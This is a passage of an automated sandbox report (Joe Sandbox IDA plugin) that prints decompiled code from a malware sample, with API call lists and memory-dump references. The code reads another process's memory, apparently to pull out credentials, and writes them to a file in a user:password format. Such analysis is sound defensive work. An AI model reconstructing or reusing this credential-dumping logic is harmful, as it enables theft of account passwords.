    						L8:
    						_t49 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), ??))();
    						goto L9;
    					}
    				}
    				_t86 = _t79 - 1;
    				if(_t86 == 0) {
    					_t100 = _a8;
    					if( *(_t100[1]) != 0) {
    						L26:
    						_push(_a12);
    						_push(0x40);
    						_t63 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
    						_v20 = _t63;
    						if(_t63 != 0) {
    							if(E00F61149( &_v20, _t100, _a12) != 0) {
    								_v28 = E00F61149(_t94,  &_v20, _a12);
    							}
    							LocalFree(_v20);
    						}
    						goto L30;
    					}
    					_t49 = WriteProcessMemory( *( *(_t45 + 4)),  *_t94,  *_t100, _a12, 0);
    					goto L9;
    				}
    				_t89 = _t86;
    				if(_t89 == 0) {
    					_t100 = _a8;
    					_t84 = _t100[1];
    					if( *(_t100[1]) != 0) {
    						goto L26;
    					}
    					_push(_a12);
    					_push( *_t100);
    					_t99 = 0;
    					_push(0x22c187);
    					goto L12;
    				}
    				if(_t89 != 3) {
    					goto L30;
    				}
    				_t100 = _a8;
    				if( *(_t100[1]) != 0) {
    					goto L26;
    				}
    				_t92 =  *_t94;
    				if(_t92 == 0 || SetFilePointer( *( *(_t45 + 4)), _t92, 0, 0) != 0) {
    					_push(0);
    					_push( &_v16);
    					_push(_a12);
    					_push( *_t100);
    					_push( *((intOrPtr*)( *((intOrPtr*)(_t94[1] + 4)))));
    					_push("WriteFile");
    					goto L8;
    				} else {
    					goto L30;
    				}
    			}


    APIs
    • ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
    • GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 90%
    			E00F63303(intOrPtr __eax) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				void* _v24;
    				char _v28;
    				short _v2076;
    				void* __esi;
    				intOrPtr _t40;
    				void* _t41;
    				void* _t42;
    				intOrPtr _t44;
    				intOrPtr _t45;
    				intOrPtr _t49;
    				signed int _t56;
    				intOrPtr* _t59;
    				signed int _t70;
    				signed int _t75;
    				signed int _t76;
    				intOrPtr _t77;
    				intOrPtr _t78;
    				intOrPtr _t79;
    				void* _t82;
    				signed int _t84;
    				intOrPtr _t85;
    				intOrPtr _t86;
    				void* _t87;
    				intOrPtr _t89;
    				intOrPtr _t90;
    				void* _t94;
    
    				_t40 = __eax;
    				_t75 = 0;
    				_t86 = __eax;
    				_v20 = 0;
    				_v16 = 0;
    				_v12 = 0;
    				_v28 = 0;
    				if( *((intOrPtr*)(__eax + 4)) != 0 ||  *((intOrPtr*)(__eax + 0xc)) != 0 ||  *((intOrPtr*)(__eax + 0x14)) != 0) {
    					_t77 =  *0xf6cd68; // 0x0
    					_t88 = _t86; // executed
    					_t41 = E00F61EFA(_t77, _t86); // executed
    					if(_t41 != 0 && E00F61F6D(_t77, _t88) != 0) {
    						_v20 = _t86;
    					}
    					_t78 =  *0xf6cd68; // 0x0
    					_t89 = _t86 + 8;
    					_t42 = E00F61EFA(_t78, _t89); // executed
    					if(_t42 != 0 && E00F61F6D(_t78, _t89) != 0) {
    						_v16 = _t89;
    					}
    					_t79 =  *0xf6cd68; // 0x0
    					_t90 = _t86 + 0x10;
    					if(E00F61EFA(_t79, _t90) != 0) {
    						_t49 =  *0xf6cec0; // 0x0
    						 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x10))))( *((intOrPtr*)(_t86 + 0x14)),  *(_t86 + 0x12) & 0x0000ffff);
    						if(E00F61F6D( *(_t86 + 0x12) & 0x0000ffff, _t90) != 0) {
    							_v12 = _t90;
    							if(_t90 != _t75) {
    								_t87 = E00F63168(_v20);
    								_v8 = E00F63168(_v16);
    								_t76 = E00F63168(_v12);
    								_v24 = _t76;
    								if(_v8 == 0) {
    									_t56 = 0;
    								} else {
    									_t70 = StrChrW(_t87, 0x5c);
    									asm("sbb eax, eax");
    									_t56 =  !( ~_t70) & _v8;
    								}
    								if(_t76 == 0) {
    									_t76 = 0xf69d58;
    								}
    								_t94 = _t87;
    								if(_t87 == 0) {
    									_t94 = 0xf69d58;
    								}
    								if(_t56 == 0) {
    									L21:
    									_t84 = 0xf69d58;
    								} else {
    									_t84 = "\\";
    									if(_t87 == 0) {
    										goto L21;
    									}
    								}
    								if(_t56 == 0) {
    									_t56 = 0xf69d58;
    								}
    								wsprintfW( &_v2076, L"%lS%lS%lS:%lS", _t56, _t84, _t94, _t76);
    								_t59 =  &_v2076;
    								_t82 = _t59 + 2;
    								do {
    									_t85 =  *_t59;
    									_t59 = _t59 + 2;
    								} while (_t85 != 0);
    								_push(0);
    								_push( &_v28);
    								_push((_t59 - _t82 >> 1) + (_t59 - _t82 >> 1) + 2);
    								_push( &_v2076);
    								_push( *0xf6bfb8);
    								 *(GetProcAddress(GetModuleHandleW(L"kernel32"), "WriteFile"))();
    								if(_t87 != 0) {
    									LocalFree(_t87);
    								}
    								if(_v8 != 0) {
    									LocalFree(_v8);
    								}
    								if(_v24 != 0) {
    									LocalFree(_v24);
    								}
    								_t75 = 0;
    							}
    						}
    					}
    					_t44 = _v20;
    					if(_t44 != _t75) {
    						LocalFree( *(_t44 + 4));
    					}
    					_t45 = _v16;
    					if(_t45 != _t75) {
    						LocalFree( *(_t45 + 4));
    					}
    					_t40 = _v12;
    					if(_t40 != _t75) {
    						return LocalFree( *(_t40 + 4));
    					}
    				}
    				return _t40;
    			}


    APIs
      • Part of subcall function 00F61EFA: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F61F38
      • Part of subcall function 00F61EFA: GetProcAddress.KERNEL32(00000000), ref: 00F61F3F
    • LocalFree.KERNEL32(?), ref: 00F634C9
      • Part of subcall function 00F61F6D: IsCharAlphaNumericW.USER32(?), ref: 00F61F83
      • Part of subcall function 00F61F6D: IsTextUnicode.ADVAPI32(?,?,?), ref: 00F61F98
      • Part of subcall function 00F63168: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,-00000002,00F69BE0,00F6323C), ref: 00F63182
      • Part of subcall function 00F63168: GetProcAddress.KERNEL32(00000000), ref: 00F63189
    • StrChrW.SHLWAPI(00000000,0000005C), ref: 00F633D8
    • wsprintfW.USER32(?,%lS%lS%lS:%lS,00000000,00F69D58,00000000,00000000), ref: 00F63423
    • GetModuleHandleW.KERNEL32(kernel32,WriteFile,?,?,?,00000000), ref: 00F63467
    • GetProcAddress.KERNEL32(00000000), ref: 00F6346E
    • LocalFree.KERNEL32(00000000), ref: 00F6347B
    • LocalFree.KERNEL32(00000000), ref: 00F63489
    • LocalFree.KERNEL32(?), ref: 00F63497
    • LocalFree.KERNEL32(?), ref: 00F634A9
    • LocalFree.KERNEL32(?), ref: 00F634B9
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 80%
    			E00F629EA(void** _a4, long _a8, intOrPtr* _a12) {
    				intOrPtr _v12;
    				void* _v16;
    				signed int _v20;
    				intOrPtr _v24;
    				void* _v28;
    				intOrPtr _v36;
    				intOrPtr _v44;
    				char _v48;
    				intOrPtr _t52;
    				void* _t58;
    				void* _t61;
    				void* _t64;
    				void* _t67;
    				void* _t70;
    				void* _t74;
    				intOrPtr* _t76;
    				void* _t86;
    				intOrPtr* _t87;
    
    				_v20 = _v20 & 0x00000000;
    				_v28 = _a4;
    				_t52 =  *((intOrPtr*)(_a8 + 8));
    				_v24 = 0xf6cd30;
    				if(_t52 >= 0x1f40) {
    					if(_t52 >= 0x24b8) {
    						_a8 = 0x3c;
    						_v12 = 0x34;
    					} else {
    						_a8 = 0x28;
    						_v12 = 0x20;
    					}
    				} else {
    					_a8 = 0x20;
    					_v12 = 0x18;
    				}
    				_push(_a8);
    				_push(0x40);
    				_t86 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
    				_v16 = _t86;
    				if(_t86 == 0) {
    					L18:
    					return _v20;
    				} else {
    					_t58 = E00F61149( &_v28, _a4, 4); // executed
    					if(_t58 != 0) {
    						_t61 = E00F61149( &_v28, _a4, 4); // executed
    						if(_t61 != 0) {
    							_v28 =  &_v48;
    							_t64 = E00F61149( &_v28, _a4, 0x14); // executed
    							if(_t64 != 0 && _v44 == 0x55555552) {
    								 *_a4 = _v36;
    								_v28 = _t86;
    								_t67 = E00F61149( &_v28, _a4, _a8); // executed
    								if(_t67 != 0 &&  *((intOrPtr*)(_t86 + 4)) == 0x4d53534b) {
    									_t87 = _t86 + _v12;
    									_push( *_t87);
    									_push(0x40);
    									_t70 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
    									_v28 = _t70;
    									if(_t70 != 0) {
    										 *_a4 = _v36 + _v12 + 4;
    										_t74 = E00F61149( &_v28, _a4,  *_t87); // executed
    										if(_t74 != 0) {
    											_t76 = _a12;
    											_t40 = _t76 + 4; // 0x4
    											_v20 = 0 |  *0xf6cd54( *_t76, _t40,  *((intOrPtr*)(_t76 + 8)),  *((intOrPtr*)(_t76 + 0xc)), _v28,  *_t87, 0) > 0x00000000;
    										}
    										LocalFree(_v28);
    									}
    									_t86 = _v16;
    								}
    							}
    						}
    					}
    					LocalFree(_t86);
    					goto L18;
    				}
    			}

    0x00f629f3
    0x00f629f7
    0x00f629fd
    0x00f62a03
    0x00f62a0f
    0x00f62a26
    0x00f62a38
    0x00f62a3f
    0x00f62a28
    0x00f62a28
    0x00f62a2f
    0x00f62a2f
    0x00f62a11
    0x00f62a11
    0x00f62a18
    0x00f62a18
    0x00f62a46
    0x00f62a4f
    0x00f62a68
    0x00f62a6a
    0x00f62a6f
    0x00f62b75
    0x00f62b7c
    0x00f62a75
    0x00f62a7e
    0x00f62a88
    0x00f62a97
    0x00f62aa1
    0x00f62aaf
    0x00f62ab6
    0x00f62ac0
    0x00f62add
    0x00f62ae3
    0x00f62ae6
    0x00f62af0
    0x00f62afb
    0x00f62afe
    0x00f62b00
    0x00f62b11
    0x00f62b13
    0x00f62b18
    0x00f62b27
    0x00f62b30
    0x00f62b3a
    0x00f62b3c
    0x00f62b43
    0x00f62b5f
    0x00f62b5f
    0x00f62b65
    0x00f62b65
    0x00f62b6b
    0x00f62b6b
    0x00f62af0
    0x00f62ac0
    0x00f62aa1
    0x00f62b6f
    0x00000000
    0x00f62b6f

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,0000003C,00000000,?,00000000), ref: 00F62A5B
    • GetProcAddress.KERNEL32(00000000), ref: 00F62A64
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000034), ref: 00F62B0C
    • GetProcAddress.KERNEL32(00000000), ref: 00F62B0F
    • LocalFree.KERNEL32(?), ref: 00F62B65
    • LocalFree.KERNEL32(00000000), ref: 00F62B6F
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 96%
    			E00F62E19(intOrPtr _a4) {
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				void* _v32;
    				intOrPtr _v36;
    				void* _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr* _v56;
    				intOrPtr _v60;
    				char _v64;
    				void* _v68;
    				void* _v72;
    				char* _v76;
    				char _v80;
    				intOrPtr _v84;
    				void* _v88;
    				intOrPtr _v92;
    				void* _v96;
    				intOrPtr _v100;
    				char _v104;
    				intOrPtr _v108;
    				void _v112;
    				intOrPtr _v116;
    				void _v120;
    				signed int _v124;
    				intOrPtr _v128;
    				intOrPtr _v132;
    				signed int _v133;
    				void* __esi;
    				intOrPtr _t108;
    				intOrPtr _t110;
    				intOrPtr _t111;
    				intOrPtr _t113;
    				void* _t114;
    				intOrPtr _t115;
    				void* _t120;
    				void* _t124;
    				void _t126;
    				void* _t129;
    				void* _t130;
    				void* _t137;
    				void* _t141;
    				void* _t143;
    				void* _t145;
    				void* _t153;
    				intOrPtr _t181;
    				intOrPtr _t185;
    				intOrPtr _t186;
    				intOrPtr _t187;
    				intOrPtr _t192;
    				intOrPtr* _t196;
    				intOrPtr _t198;
    				signed int _t207;
    				void* _t209;
    
    				_t209 = (_t207 & 0xfffffff8) - 0x7c;
    				_t198 = 0xf6cd30;
    				_v120 = 1;
    				_v104 =  &_v120;
    				_v100 = 0xf6cd30;
    				_v88 = 0;
    				_v84 = 0xf6cd30;
    				_v116 = 1;
    				_t108 = E00F62B7D();
    				_v108 = _t108;
    				if(_t108 < 0) {
    					L38:
    					return _v108;
    				} else {
    					_t110 =  *0xf6cec0; // 0x0
    					_v52 = _t110;
    					_t111 =  *0xf6cd74; // 0x0
    					_v56 = 0xf6cd68;
    					if(_t111 >= 0xbb8) {
    						__eflags = _t111 - 0x1388;
    						if(_t111 >= 0x1388) {
    							__eflags = _t111 - 0x1b58;
    							if(_t111 >= 0x1b58) {
    								__eflags = _t111 - 0x1f40;
    								if(_t111 >= 0x1f40) {
    									_t196 = 0xf69cc4;
    									__eflags = _t111 - 0x24b8;
    									if(_t111 >= 0x24b8) {
    										_t196 = 0xf69cf0;
    									}
    								} else {
    									_t196 = 0xf69c6c;
    								}
    							} else {
    								_t196 = 0xf69c40;
    							}
    						} else {
    							_t196 = 0xf69c14;
    						}
    					} else {
    						_t196 = 0xf69be8;
    					}
    					if(_t111 + 0xffffe4a8 <= 0x95f &&  *0xf6bb98 > 0x53480000) {
    						_t196 = _t196 + 0x2c;
    					}
    					_t113 =  *0xf6cd68; // 0x0
    					_v92 = _t113;
    					_t114 =  *0xf6cd80; // 0x0
    					_v96 = _t114;
    					if(_t114 != 0) {
    						E00F61149( &_v104,  &_v96, 4); // executed
    						_t209 = _t209 + 0xc;
    					}
    					_v124 = 0;
    					if(_v120 > 0) {
    						do {
    							_push( *_t196);
    							_t115 =  *0xf6cd7c; // 0x0
    							_push(0x40);
    							_v96 = _t115 + _v124 * 8;
    							_v104 =  &_v112;
    							_v100 = _t198;
    							_t120 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
    							_v96 = _t120;
    							if(_t120 == 0) {
    								goto L37;
    							}
    							_t124 = E00F61149( &_v112,  &_v104, 4); // executed
    							_t209 = _t209 + 0xc;
    							if(_t124 == 0) {
    								L36:
    								LocalFree(_v96);
    								_t198 = 0xf6cd30;
    								goto L37;
    							}
    							_t126 = _v120;
    							_v108 = _v100;
    							while(1) {
    								_v112 = _t126;
    								if(_t126 == _v104) {
    									goto L36;
    								}
    								__eflags = _v124;
    								if(_v124 == 0) {
    									goto L36;
    								}
    								_t129 = E00F61149( &_v96,  &_v112,  *_t196); // executed
    								_t209 = _t209 + 0xc;
    								__eflags = _t129;
    								if(_t129 == 0) {
    									goto L36;
    								}
    								_t130 = _v96;
    								_t34 = _t196 + 4; // 0x40
    								_t35 = _t196 + 0x10; // 0x50
    								_v56 =  *_t34 + _t130;
    								_t37 = _t196 + 8; // 0x74
    								_v44 =  *((intOrPtr*)(_t130 +  *_t37));
    								_t40 = _t196 + 0xc; // 0x7c
    								_v40 =  *((intOrPtr*)(_t130 +  *_t40));
    								_t43 = _t196 + 0x14; // 0x58
    								_v48 =  *_t43 + _t130;
    								_t45 = _t196 + 0x18; // 0x90
    								_v52 =  *_t35 + _t130;
    								_v36 =  *((intOrPtr*)(_t130 +  *_t45));
    								_t49 = _t196 + 0x1c; // 0x70
    								_v32 =  *((intOrPtr*)(_t130 +  *_t49));
    								_t52 = _t196 + 0x20; // 0xc0
    								_v28 =  *((intOrPtr*)(_t130 +  *_t52));
    								_t55 = _t196 + 0x24; // 0x80
    								_t181 =  *_t55;
    								_v24 =  *((intOrPtr*)(_t181 + _t130));
    								_v20 =  *((intOrPtr*)(_t181 + _t130 + 4));
    								_t61 = _t196 + 0x28; // 0x88
    								_v16 =  *_t61 + _t130;
    								_t185 =  *0xf6cd68; // 0x0, executed
    								E00F61EFA(_t185,  *_t35 + _t130);
    								_t186 =  *0xf6cd68; // 0x0
    								E00F61EFA(_t186, _v48);
    								_t187 =  *0xf6cd68; // 0x0
    								E00F61EFA(_t187, _v16); // executed
    								_v80 =  &_v133;
    								_v76 =  &_v72;
    								_v72 = 0;
    								_v68 = 0;
    								_v32 = 0;
    								_v88 = _v32 + 1;
    								_t192 =  *0xf6cd68; // 0x0
    								_v84 = _t192;
    								_t137 = E00F61149( &_v80,  &_v88, 1); // executed
    								_t209 = _t209 + 0xc;
    								__eflags = _t137;
    								if(__eflags != 0) {
    									_v88 = _v88 - 1;
    									_t206 = 8 + (_v133 & 0x000000ff) * 4;
    									_push(8 + (_v133 & 0x000000ff) * 4);
    									_push(0x40);
    									_t153 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
    									_v88 = _t153;
    									__eflags = _t153;
    									if(__eflags != 0) {
    										_v40 = _t153;
    										E00F61149( &_v88,  &_v96, _t206); // executed
    										_t209 = _t209 + 0xc;
    									}
    								}
    								_v132 = E00F63285(__eflags,  &_v64, _a4);
    								_t141 =  *(_v60 + 4);
    								__eflags = _t141;
    								if(_t141 != 0) {
    									LocalFree(_t141);
    								}
    								_t143 =  *(_v48 + 4);
    								__eflags = _t143;
    								if(_t143 != 0) {
    									LocalFree(_t143);
    								}
    								_t145 =  *(_v16 + 4);
    								__eflags = _t145;
    								if(_t145 != 0) {
    									LocalFree(_t145);
    								}
    								__eflags = _v32;
    								if(_v32 != 0) {
    									LocalFree(_v32);
    								}
    								_t126 =  *_v96;
    							}
    							goto L36;
    							L37:
    							_v132 = _v132 + 1;
    						} while (_v132 < _v128);
    					}
    					goto L38;
    				}
    			}

    0x00f62e1f
    0x00f62e2b
    0x00f62e33
    0x00f62e37
    0x00f62e3b
    0x00f62e3f
    0x00f62e43
    0x00f62e47
    0x00f62e4b
    0x00f62e50
    0x00f62e56
    0x00f6315d
    0x00f63167
    0x00f62e5c
    0x00f62e5c
    0x00f62e61
    0x00f62e65
    0x00f62e6a
    0x00f62e77
    0x00f62e80
    0x00f62e85
    0x00f62e8e
    0x00f62e93
    0x00f62e9c
    0x00f62ea1
    0x00f62eaa
    0x00f62eaf
    0x00f62eb4
    0x00f62eb6
    0x00f62eb6
    0x00f62ea3
    0x00f62ea3
    0x00f62ea3
    0x00f62e95
    0x00f62e95
    0x00f62e95
    0x00f62e87
    0x00f62e87
    0x00f62e87
    0x00f62e79
    0x00f62e79
    0x00f62e79
    0x00f62ec5
    0x00f62ed3
    0x00f62ed3
    0x00f62ed6
    0x00f62edb
    0x00f62edf
    0x00f62ee4
    0x00f62eea
    0x00f62ef8
    0x00f62efd
    0x00f62efd
    0x00f62f00
    0x00f62f08
    0x00f62f14
    0x00f62f14
    0x00f62f16
    0x00f62f22
    0x00f62f24
    0x00f62f36
    0x00f62f3a
    0x00f62f47
    0x00f62f49
    0x00f62f4f
    0x00000000
    0x00000000
    0x00f62f61
    0x00f62f66
    0x00f62f6b
    0x00f6313c
    0x00f63140
    0x00f63146
    0x00000000
    0x00f63146
    0x00f62f75
    0x00f62f79
    0x00f6312e
    0x00f6312e
    0x00f63136
    0x00000000
    0x00000000
    0x00f62f82
    0x00f62f87
    0x00000000
    0x00000000
    0x00f62f99
    0x00f62f9e
    0x00f62fa1
    0x00f62fa3
    0x00000000
    0x00000000
    0x00f62fa9
    0x00f62fad
    0x00f62fb2
    0x00f62fb5
    0x00f62fb9
    0x00f62fbf
    0x00f62fc3
    0x00f62fc9
    0x00f62fcd
    0x00f62fd2
    0x00f62fd6
    0x00f62fdb
    0x00f62fe2
    0x00f62fe6
    0x00f62fec
    0x00f62ff0
    0x00f62ff6
    0x00f62ffa
    0x00f62ffa
    0x00f63000
    0x00f63008
    0x00f6300f
    0x00f63014
    0x00f6301b
    0x00f63021
    0x00f63026
    0x00f63030
    0x00f63035
    0x00f63042
    0x00f6304d
    0x00f63055
    0x00f6305d
    0x00f63061
    0x00f63065
    0x00f63071
    0x00f63075
    0x00f63080
    0x00f63084
    0x00f63089
    0x00f6308c
    0x00f6308e
    0x00f63095
    0x00f63099
    0x00f630a0
    0x00f630a1
    0x00f630b6
    0x00f630b8
    0x00f630bc
    0x00f630be
    0x00f630c0
    0x00f630cf
    0x00f630d4
    0x00f630d4
    0x00f630be
    0x00f630ea
    0x00f630f2
    0x00f630f5
    0x00f630f7
    0x00f630fa
    0x00f630fa
    0x00f63100
    0x00f63103
    0x00f63105
    0x00f63108
    0x00f63108
    0x00f63111
    0x00f63114
    0x00f63116
    0x00f63119
    0x00f63119
    0x00f6311b
    0x00f63120
    0x00f63126
    0x00f63126
    0x00f6312c
    0x00f6312c
    0x00000000
    0x00f6314b
    0x00f6314b
    0x00f63153
    0x00f62f14
    0x00000000
    0x00f62f08

    APIs
      • Part of subcall function 00F62B7D: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F62BE8
      • Part of subcall function 00F62B7D: OpenProcess.KERNEL32(00F6BD30,00000000,?), ref: 00F62C0C
      • Part of subcall function 00F62B7D: GetCurrentProcess.KERNEL32(?), ref: 00F62CB6
      • Part of subcall function 00F62B7D: IsWow64Process.KERNEL32(00000000), ref: 00F62CBD
      • Part of subcall function 00F62B7D: CloseHandle.KERNEL32(?), ref: 00F62DB4
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00F69CC4), ref: 00F62F3E
    • GetProcAddress.KERNEL32(00000000), ref: 00F62F45
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
      • Part of subcall function 00F61EFA: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F61F38
      • Part of subcall function 00F61EFA: GetProcAddress.KERNEL32(00000000), ref: 00F61F3F
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F630AD
    • GetProcAddress.KERNEL32(00000000), ref: 00F630B4
    • LocalFree.KERNEL32(00000002,?,00F69BE0), ref: 00F630FA
    • LocalFree.KERNEL32(00000002,?,00F69BE0), ref: 00F63108
    • LocalFree.KERNEL32(00000002,?,00F69BE0), ref: 00F63119
    • LocalFree.KERNEL32(00000000), ref: 00F63126
    • LocalFree.KERNEL32(?), ref: 00F63140
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 76%
    			E00F619EE(intOrPtr __eax, intOrPtr _a4, intOrPtr _a8) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				intOrPtr* _v20;
    				void* _v24;
    				signed short _v26;
    				void* _v28;
    				void* _v32;
    				intOrPtr _v36;
    				signed int _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				char _v52;
    				intOrPtr _v56;
    				char _v60;
    				intOrPtr _v64;
    				char _v68;
    				char _v72;
    				char _v84;
    				char _v88;
    				unsigned int _v92;
    				intOrPtr _v104;
    				char _v112;
    				intOrPtr _v128;
    				char _v136;
    				intOrPtr _v152;
    				char _v172;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t121;
    				char _t125;
    				intOrPtr _t132;
    				void* _t133;
    				void* _t136;
    				void* _t141;
    				char _t143;
    				intOrPtr _t146;
    				unsigned int _t150;
    				void* _t154;
    				void* _t159;
    				void* _t164;
    				intOrPtr _t181;
    				intOrPtr _t183;
    				intOrPtr* _t185;
    				intOrPtr* _t186;
    				char _t193;
    				intOrPtr* _t194;
    				intOrPtr* _t195;
    				intOrPtr* _t201;
    				intOrPtr _t211;
    				void* _t213;
    				intOrPtr _t215;
    				void* _t216;
    				void* _t218;
    				intOrPtr* _t219;
    				char* _t220;
    				char* _t221;
    				char* _t222;
    				void* _t225;
    				void* _t226;
    				void* _t227;
    
    				_t214 = __eax;
    				_t193 = 0;
    				_t121 =  *((intOrPtr*)(__eax));
    				_v16 = 0xc0000135;
    				_v68 = 0;
    				_v64 = 0xf6cd30;
    				_v60 = 0;
    				_v56 = __eax;
    				_v32 = 0;
    				_v8 = 1;
    				_v48 = __eax;
    				if(_t121 == 0) {
    					if(E00F61D5F( &_v84, __eax) == 0) {
    						L43:
    						return _v16;
    					}
    					_t125 = _v72;
    					_t215 =  *((intOrPtr*)(_t125 + 0x14));
    					while(1) {
    						_t216 = _t215 - 8;
    						if(_t216 == _t125 + 0xc) {
    							break;
    						}
    						if(_v8 == _t193) {
    							break;
    						}
    						_v52 =  *((intOrPtr*)(_t216 + 0x18));
    						_v44 =  *((intOrPtr*)(_t216 + 0x20));
    						_t220 =  &_v52;
    						_v36 = _t216 + 0x2c;
    						E00F61CFA(_t220);
    						_t132 = _a4(_t220, _a8);
    						_t215 =  *((intOrPtr*)(_t216 + 8));
    						_v8 = _t132;
    						_t125 = _v72;
    					}
    					L42:
    					_v16 = _t193;
    					goto L43;
    				}
    				_t133 = _t121 - 1;
    				if(_t133 == 0) {
    					_v36 =  &_v28;
    					_t136 = E00F61D5F( &_v84, __eax); // executed
    					if(_t136 == 0) {
    						goto L43;
    					}
    					_v68 =  &_v172;
    					_v60 = _v72;
    					_t141 = E00F61149( &_v68,  &_v60, 0x24); // executed
    					_t227 = _t226 + 0xc;
    					if(_t141 == 0) {
    						goto L43;
    					}
    					_t143 = _v152 + 0xfffffff8;
